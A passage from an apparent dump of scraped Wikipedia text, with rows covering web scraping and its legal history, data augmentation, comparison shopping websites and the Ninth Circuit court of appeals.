to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
280 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-24 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
281 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_augmentation | Data augmentation is a statistical technique which allows maximum likelihood estimation from incomplete data. 1 2 Data augmentation has important applications in Bayesian analysis, 3 and the technique is widely used in machine learning to reduce overfitting when training machine learning models, 4 achieved by training models on several slightly-modified copies of existing data. Synthetic Minority Over-sampling Technique (SMOTE) is a method used to address imbalanced datasets in machine learning. In such datasets, the number of samples in different classes varies significantly, leading to biased model performance. For example, in a medical diagnosis dataset with 90 samples representing healthy individuals and only 10 samples representing individuals with a particular disease, traditional algorithms may struggle to accurately classify the minority class. SMOTE rebalances the dataset by generating synthetic samples for the minority class. For instance, if there are 100 samples in the majority class and 10 in the minority class, SMOTE can create synthetic samples by randomly selecting a minority class sample and its nearest neighbors, then generating new samples along the line segments joining these neighbors. This process helps increase the representation of the minority class, improving model performance. 5 When convolutional neural networks grew larger in mid 1990s, there was a lack of data to use, especially considering that some part of the overall dataset should be spared for later testing. It was proposed to perturb existing data with affine transformations to create new examples with the same labels, 6 which were complemented by so-called elastic distortions in 2003, 7 and the technique was widely used as of 2010s. 8 Data augmentation can enhance CNN performance and acts as a countermeasure against CNN profiling attacks. 9 Data augmentation has become fundamental in image classification, enriching training dataset diversity to improve model generalization and performance. The evolution of this practice has introduced a broad spectrum of techniques, including geometric transformations, color space adjustments, and noise injection. 10 Geometric transformations alter the spatial properties of images to simulate different perspectives, orientations, and scales. Common techniques include: Color space transformations modify the color properties of images, addressing variations in lighting, color saturation, and contrast. Techniques include: Injecting noise into images simulates real-world imperfections, teaching models to ignore irrelevant variations. Techniques involve: Residual or block bootstrap can be used for time series augmentation. Synthetic data augmentation is of paramount importance for machine learning classification, particularly for biological data, which tend to be high dimensional and scarce. The applications of robotic control and augmentation in disabled and able-bodied subjects still rely mainly on subject-specific analyses. Data scarcity is notable in signal processing problems such as for Parkinson's Disease Electromyography signals, which are difficult to source - Zanini, et al. noted that it is possible to use a generative adversarial network (in particular, a DCGAN) to perform style transfer in order to generate synthetic electromyographic signals that corresponded to those exhibited by sufferers of Parkinson's Disease. 11 The approaches are also important in electroencephalography (brainwaves). Wang, et al. explored the idea of using deep convolutional neural networks for EEG-Based Emotion Recognition, results show that emotion recognition was improved when data augmentation was used. 12 A common approach is to generate synthetic signals by re-arranging components of real data. Lotte 13 proposed a method of "Artificial Trial Generation Based on Analogy" where three data examples x 1 , x 2 , x 3 displaystyle x 1 ,x 2 ,x 3 provide examples and an artificial x s y n t h e t i c displaystyle x synthetic is formed which is to x 3 displaystyle x 3 what x 2 displaystyle x 2 is to x 1 displaystyle x 1 . A transformation is applied to x 1 displaystyle x 1 to make it more similar to x 2 displaystyle x 2 , the same transformation is then applied to x 3 displaystyle x 3 which generates x s y n t h e t i c displaystyle x synthetic . This approach was shown to improve performance of a Linear Discriminant Analysis classifier on three different datasets. Current research shows great impact can be derived from relatively simple techniques. For example, Freer 14 observed that introducing noise into gathered data to form additional data points improved the learning ability of several models which otherwise performed relatively poorly. Tsinganos et al. 15 studied the approaches of magnitude warping, wavelet decomposition, and synthetic surface EMG models (generative approaches) for hand gesture recognition, finding classification performance increases of up to 16% when augmented data was introduced during training. More recently, data augmentation studies have begun to focus on the field of deep learning, more specifically on the ability of generative models to create artificial data which is then introduced during the classification model training process. In 2018, Luo et al. 16 observed that useful EEG signal data could be generated by Conditional Wasserstein Generative Adversarial Networks (GANs) which was then introduced to the training set in a classical train-test learning framework. The authors found classification performance was improved when such techniques were introduced. The prediction of mechanical signals based on data augmentation brings a new generation of technological innovations, such as new energy dispatch, 5G communication field, and robotics control engineering. 17 In 2022, Yang et al. 17 integrate constraints, optimization and control into a deep network framework based on data augmentation and data pruning with spatio-temporal data correlation, and improve the interpretability, safety and controllability of deep learning in real industrial projects through explicit mathematical programming equations and analytical solutions. |
282 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Comparison_shopping_website | A comparison shopping website, sometimes called a price comparison website, price analysis tool, comparison shopping agent, shopbot, aggregator or comparison shopping engine, is a vertical search engine that shoppers use to filter and compare products based on price, features, reviews and other criteria. Most comparison shopping sites aggregate product listings from many different retailers but do not directly sell products themselves, instead earning money from affiliate marketing agreements. In the United Kingdom, these services made between 780m and 950m in revenue in 2005 1 needs update . Hence, E-commerce accounted for an 18.2 percent share of total business turnover in the United Kingdom in 2012. Online sales already account for 13% of the total UK economy, and its expected to increase to 15% by 2017. There is a huge contribution of comparison shopping websites in the expansion of the current E-commerce industry. The first widely recognized comparison-shopping agent was BargainFinder, developed by Andersen Consulting (now Accenture). The team, led by researcher Bruce Krulwich, created BargainFinder in 1995 as an experiment and published it on-line without advance warning to the e-commerce sites being compared. The first commercial shopping agent, called Jango, was produced by Netbot, a Seattle startup company founded by University of Washington professors Oren Etzioni and Daniel S. Weld; Netbot was acquired by the Excite portal in late 1997. Junglee, a Bay-area startup, also pioneered comparison shopping technology and was soon acquired by Amazon.com. Other early comparison shopping agents included pricewatch.com and killerapp.com. NexTag another entry into comparison shopping was named Times magazine world top 50 website in 2008, 2 only to eventually close in 2018. 3 In 2005, PriceGrabber was acquired by Experian for $485 million, negotiated by then-CEO and founder of the company, Kamran Pourzanjani, along with Tamim Mourad, in 1999. 4 5 Around 2010, the price comparison websites found their way to emerging markets. Especially South-East Asia has been a place for many new comparison websites. citation needed It started in 2010 with CompareXpress in Singapore, and in the following years companies like Baoxian (China), Jirnexu (Malaysia), and AskHanuman (Thailand) followed. 6 Meanwhile, in developed markets, Google was accused of promoting Froogle and its replacement, the paid-placement-only Google Shopping, over competitors in its search results, driving down traffic to other sites and driving some out of business. 7 The European Commission began an investigation in 2010, which concluded in July 2017 with a 2.42 billion fine against the parent company Alphabet, and an order to change its practices within 90 days. 8 In the early development stage from 1995 to 2000, comparison shopping agents included not only price comparison but also rating and review services for online vendors and products. Altogether, there were three broad categories of comparison shopping services. 9 Later, through mergers and acquisitions, many services were consolidated. Through 1998 and 1999, various firms developed technology that searched retailers websites for prices and stored them in a central database. Users could then search for a product, and see a list of retailers and prices for that product. Advertisers did not pay to be listed but paid for every click on a price. Streetprices, founded in 1997, has been a very early company in this space; it invented price graphs and email alerts in 1998. 10 Price comparison sites can collect data directly from merchants. Retailers who want to list their products on the website then supply their own lists of products and prices, and these are matched against the original database. This is done by a mixture of information extraction, fuzzy logic and human labour. Comparison sites can also collect data through a data feed file. Merchants provide information electronically in a set format. This data is then imported by the comparison website. Some third party businesses are providing consolidation of data feeds so that comparison sites do not have to import from many different merchants. Affiliate networks aggregate data feeds from many merchants and provide them to the price comparison sites. Many of the popular shopping websites provide direct affiliation to the customer who wants to become affiliate partner. They provide their own API to the affiliate partner to show their products with specifications to the affiliate partner's website. This enables price comparison sites to monetize the products contained in the feeds by earning commissions on click through traffic. citation needed Other price comparison sites have deals with merchants and aggregate feeds using their own technology. citation needed In recent years, many off the shelf software solutions 11 have been developed that allow website owners to take price comparison websites' inventory data to place retailer prices (context adverts) on their blog or content the only website. In return, the content website owners receive a small share of the revenue earned by the price comparison website. This is often referred to as the revenue share 12 business model. Another approach is to crawl the web for prices. This means the comparison service scans retail web pages to retrieve the prices, instead of relying on the retailers to supply them. This method is also sometimes called 'scraping' information. Some, mostly smaller, independent sites solely use this method, to get prices directly from the websites that it is using for the comparison. Yet another approach to collect data is through crowdsourcing. This lets the price comparison engine collect data from almost any source without the complexities of building a crawler or the logistics of setting up data feeds at the expense of lower coverage comprehensiveness. Sites that use this method rely on visitors contributing pricing data. Unlike discussion forums, which also collect visitor input, price comparison sites that use this method combine data with related inputs and add it to the main database though collaborative filtering, artificial intelligence, or human labor. Data contributors may be rewarded for the effort through prizes, cash, or other social incentives. However, some combination of these two approaches is most frequently used. Some search engines are starting to blend information from standard feeds with information from sites where product stock-keeping units (SKUs) are unavailable. Empirical projects that assessed the functionality and performance of page-wise SSC engines (AKA bots) exist. These studies demonstrate that no best or parsimonious shopping bot exists with respect to price advantage. 13 14 Price comparison sites typically do not charge users anything to use the site. Instead, they are monetized through payments from retailers who are listed on the site. Depending on the particular business model of the comparison shopping site, retailers either pay a flat fee to be included on the site, pay a fee each time a user clicks through to the retailer web site, or pay every time a user completes a specified action—for example, when they buy something or register with their e-mail address. Comparison shopping sites obtain large product data feeds covering many different retailers from affiliate networks such as LinkShare and Commission Junction. There are also companies that specialize in data feed consolidation for the purpose of price comparison and that charge users for accessing this data. When products from these feeds are displayed on their sites they earn money each time a visitor clicks through to the merchant's site and buys something. Search results may be sorted by the amount of payment received from the merchants listed on the website. 15 large price comparison sites. 16 In addition to comparing tangible goods, some sites compare prices of services, such as insurance, credit cards, phone bills, and money transfer. Like most websites, price comparison websites partly rely on search engines for visitors. The general nature of shopping focused price comparison websites is that, since their content is provided by retail stores, content on price comparison websites is unlikely to be absolutely unique. The table style layout of a comparison website could be considered by Google as "Autogenerated Content and Roundup Comparison Type of Pages". 17 As of the 2011 updates to its search algorithm, known as Google Panda, Google seems to have started considering these comparison sites to be of low quality. 18 Due to large affiliate network providers providing easily accessible information on large amounts of similar products from multiple vendors, in recent years small price comparison sites have been able to use technology that was previously only available to large price comparison sites. 16 This technology includes software and plugins aimed to standardize the typical processes involving price and product comparison. Without much resources it became possible for amateurs to build seemingly professional websites, mostly using the popular Wordpress CMS. These small sites often rely on Google for their visitors, which are monetized using affiliate networks like Amazon. The low content quality of typical niche sites, often bordering on spam and fraud, is a growing problem from the perspective of consumer protection and the quality of search engines. By playing the algorithm of search engine giant Google, it is possible to place low quality sites prominently in the search results. Until recently the phenomenon of fake test or comparison websites had escaped public attention. An analysis by testbericht.de discovered that 34,6% of German search traffic related to product tests on the first page of google leads to fake test sites. 19 When a big German newspaper published a report about such a website 20 and consumer protection organization sending out warning letters, 20 observers started to note a sense of panic in the industry, with site owners changing or deleting the content in question. 21 Amazon, being the biggest player in the affiliate market, declined to comment on the matter. 19 Deceptive comparison sites give the impression of testing a product thoroughly. In reality, the tests are just an aggregation of freely available information, often leading to the most expensive products being recommended. This in turn increases the commission rate the site owners earn for the recommended products. 22 In 2017, the European Commission fined Google 2.42BN for allegedly monopolising the comparison shopping engine (CSE) market. 23 Google released a statement that the European Commission's assessment will be appealed. 24 Google will review the formal decision, but expects that it will accrue the fine in the second quarter of 2017. 25 |
283 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Ninth_Circuit | The United States Court of Appeals for the Ninth Circuit (in case citations, 9th Cir.) is the U.S. federal court of appeals that has appellate jurisdiction over the U.S. district courts in the following federal judicial districts: The Ninth Circuit also has appellate jurisdiction over the territorial courts for the District of Guam and the District of the Northern Mariana Islands. Additionally, it sometimes handles appeals that originate from American Samoa, which has no district court and partially relies on the District of Hawaii for its federal cases. 1 Headquartered in San Francisco, California, the Ninth Circuit is by far the largest of the 13 U.S. Courts of Appeals, covering a total of nine states and two territories and with 29 active judgeships. The court's regular meeting places are Seattle at the William Kenzo Nakamura United States Courthouse, Portland at the Pioneer Courthouse, San Francisco at the James R. Browning U.S. Court of Appeals Building, and Pasadena at the Richard H. Chambers U.S. Court of Appeals. Panels of the court occasionally travel to hear cases in other locations within the circuit. Although the judges travel around the circuit, the court arranges its hearings so that cases from the northern region of the circuit are heard in Seattle or Portland, cases from southern California and Arizona are heard in Pasadena, and cases from northern California, Nevada, Hawaii, and the Pacific territories are heard in San Francisco. Additionally, the court holds yearly sittings in Anchorage and Honolulu. For lawyers who must come and present their cases to the court in person, this administrative grouping of cases helps to reduce the time and cost of travel. Ninth Circuit judges are also appointed by the United States Secretary of the Interior to serve as temporary acting Associate Justices for non-federal appellate sessions at the High Court of American Samoa in Fagatogo. 1 The Ninth Circuit's large size is due to the dramatic increases in both the population of the western states and the court's geographic jurisdiction that have occurred since the U.S. Congress created the Ninth Circuit in 1891. 2 The court was originally granted appellate jurisdiction over federal district courts in California, Idaho, Montana, Nevada, Oregon, and Washington. As new states and territories were added to the federal judicial hierarchy in the twentieth century, many of those in the West were placed in the Ninth Circuit: the newly acquired Territory of Hawaii in 1900, Arizona upon its admission to the Union in 1912, the Territory of Alaska in 1948, Guam in 1951, and the Commonwealth of the Northern Mariana Islands in 1977. The Ninth Circuit also had jurisdiction over certain American interests in China, in that it had jurisdiction over appeals from the United States Court for China during the existence of that court from 1906 through 1943. 3 a However, the Philippines was never under the Ninth Circuit's jurisdiction. Congress never created a federal district court in the Philippines from which the Ninth Circuit could hear appeals. 4 Instead, appeals from the Supreme Court of the Philippines were taken directly to the Supreme Court of the United States. 5 In 1979, the Ninth Circuit became the first federal judicial circuit to set up a Bankruptcy Appellate Panel as authorized by the Bankruptcy Reform Act of 1978. The cultural and political jurisdiction of the Ninth Circuit is just as varied as the land within its geographical borders. In a dissenting opinion in a rights of publicity case involving the Wheel of Fortune star Vanna White, Circuit Judge Alex Kozinski sardonically noted that f or better or worse, we are the Court of Appeals for the Hollywood Circuit. 6 Judges from more remote parts of the circuit note the contrast between legal issues confronted by populous states such as California and those confronted by rural states such as Alaska, Idaho, Montana, and Nevada. Judge Andrew J. Kleinfeld, who maintains his judicial chambers in Fairbanks, Alaska, wrote in a letter in 1998: "Much federal law is not national in scope....It is easy to make a mistake construing these laws when unfamiliar with them, as we often are, or not interpreting them regularly, as we never do. 7 From 1999 to 2008, of the Ninth Circuit Court rulings that were reviewed by the Supreme Court, 20% were affirmed, 19% were vacated, and 61% were reversed; the median reversal rate for all federal appellate courts was 68.29% for the same period. 8 From 2010 to 2015, of the 